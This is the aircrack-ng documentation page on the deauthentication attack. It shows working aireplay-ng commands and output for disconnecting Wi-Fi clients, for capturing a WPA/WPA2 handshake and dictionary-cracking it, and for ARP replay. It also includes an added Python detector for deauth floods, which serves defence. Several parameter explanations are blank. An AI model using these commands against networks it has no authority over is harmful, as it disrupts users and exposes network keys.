Deauthentication

Description

This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

Of course, this attack is totally useless if there are no associated wireless clients, or against fake authentications.

Usage

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

Usage Examples

Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the following command:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

Where:

Here is typical output:

 12:35:25  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.
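
The 128-packet pattern described above (64 frames spoofed from the AP to the client and 64 spoofed from the client to the AP, inside well under a second) is what a wireless IDS keys on. The following detector is an added example and is not part of aircrack-ng or of this page; it parses the 24-byte 802.11 management header and the 2-byte reason code of raw frames, groups deauthentication frames per (BSSID, station) pair in either direction, and raises an alert when a sliding one-second window holds more than a threshold of them. The frame layout follows the IEEE 802.11 header (frame control, duration, three addresses, sequence control); the window and threshold values, the timestamps, and the sample frames (built with the MAC addresses from this page, reason code 7 for the flood and reason code 3 for one ordinary disconnect) are all constructed for the example.

```python
"""Detect directed deauthentication bursts in raw 802.11 management frames (added example)."""
import struct
from collections import defaultdict

# Frame control values from the IEEE 802.11 header: type 0 is management,
# subtype 12 is deauthentication, subtype 8 is beacon.
TYPE_MGMT = 0
SUBTYPE_DEAUTH = 12
SUBTYPE_BEACON = 8


def mac_str(b):
    return ":".join(f"{x:02X}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_mgmt_frame(raw):
    """Parse the 24-byte management header plus, for deauth, the 2-byte reason code.
    Returns None for non-management frames or frames that are too short."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    version = fc & 0x03
    ftype = (fc >> 2) & 0x03
    subtype = (fc >> 4) & 0x0F
    if version != 0 or ftype != TYPE_MGMT:
        return None
    frame = {
        "subtype": subtype,
        "dst": mac_str(raw[4:10]),    # address 1: receiver
        "src": mac_str(raw[10:16]),   # address 2: transmitter
        "bssid": mac_str(raw[16:22]), # address 3: BSSID for management frames
    }
    if subtype == SUBTYPE_DEAUTH and len(raw) >= 26:
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]  # little-endian
    return frame


def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_bytes).
    A directed deauth attack spoofs frames both AP->client and client->AP, so both
    directions are counted against the same (bssid, station) pair. Returns one
    alert dict per pair whose deauth count inside any `window`-second span
    exceeds `threshold` (both values are assumptions chosen for the example)."""
    per_pair = defaultdict(list)  # (bssid, station) -> [(timestamp, direction)]
    for ts, raw in frames:
        f = parse_mgmt_frame(raw)
        if f is None or f["subtype"] != SUBTYPE_DEAUTH:
            continue
        bssid = f["bssid"]
        if f["src"] == bssid:
            station, direction = f["dst"], "ap_to_sta"
        else:
            station, direction = f["src"], "sta_to_ap"
        per_pair[(bssid, station)].append((ts, direction))

    alerts = []
    for (bssid, station), events in per_pair.items():
        events.sort()
        times = [t for t, _ in events]
        best, start = 0, 0  # sliding window over sorted timestamps
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            alerts.append({
                "bssid": bssid,
                "station": station,
                "max_in_window": best,
                "ap_to_sta": sum(1 for _, d in events if d == "ap_to_sta"),
                "sta_to_ap": sum(1 for _, d in events if d == "sta_to_ap"),
            })
    return alerts


def build_frame(subtype, dst, src, bssid, body=b""):
    """Build a minimal management frame. Constructed sample data, not a real capture."""
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    duration = b"\x00\x00"
    seq_ctrl = b"\x00\x00"
    return fc + duration + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + seq_ctrl + body


AP = "00:14:6C:7E:40:80"
STA = "00:0F:B5:AE:CE:9D"
OTHER = "00:0F:B5:34:30:30"
REASON_CLASS3 = struct.pack("<H", 7)   # reason 7: class 3 frame from non-associated STA
REASON_LEAVING = struct.pack("<H", 3)  # reason 3: station is leaving (a normal disconnect)


def sample_capture():
    """Constructed timeline: a beacon, one benign disconnect, then 128 directed deauths."""
    frames = []
    t = 45325.0  # seconds since midnight, i.e. 12:35:25
    frames.append((t - 5.0, build_frame(SUBTYPE_BEACON, "FF:FF:FF:FF:FF:FF", AP, AP)))
    frames.append((t - 3.0, build_frame(SUBTYPE_DEAUTH, AP, OTHER, AP, REASON_LEAVING)))
    for i in range(64):
        ts = t + i * 0.005
        frames.append((ts, build_frame(SUBTYPE_DEAUTH, STA, AP, AP, REASON_CLASS3)))
        frames.append((ts + 0.001, build_frame(SUBTYPE_DEAUTH, AP, STA, AP, REASON_CLASS3)))
    return frames


if __name__ == "__main__":
    for a in detect_deauth_bursts(sample_capture()):
        print(f"deauth burst: BSSID {a['bssid']} station {a['station']} "
              f"{a['max_in_window']} frames in window "
              f"({a['ap_to_sta']} AP->STA, {a['sta_to_ap']} STA->AP)")
```

Counting both directions against one pair is deliberate: a single spoofed direction already disconnects the station, and a monitor that only watches frames addressed to clients would miss half of the traffic this page describes. The single reason-3 deauth from a different station stays below the threshold and raises nothing, which is the behaviour you want for ordinary roaming and shutdowns.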

Here is what the “[ 61|63 ACKs]” means:

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Explanation of the above:

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
Where:

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type); otherwise the card won't be correctly set up for injection.

Usage Tips

It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting

Why does deauthentication not work?

There can be several reasons and one or more can affect you:

General

See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.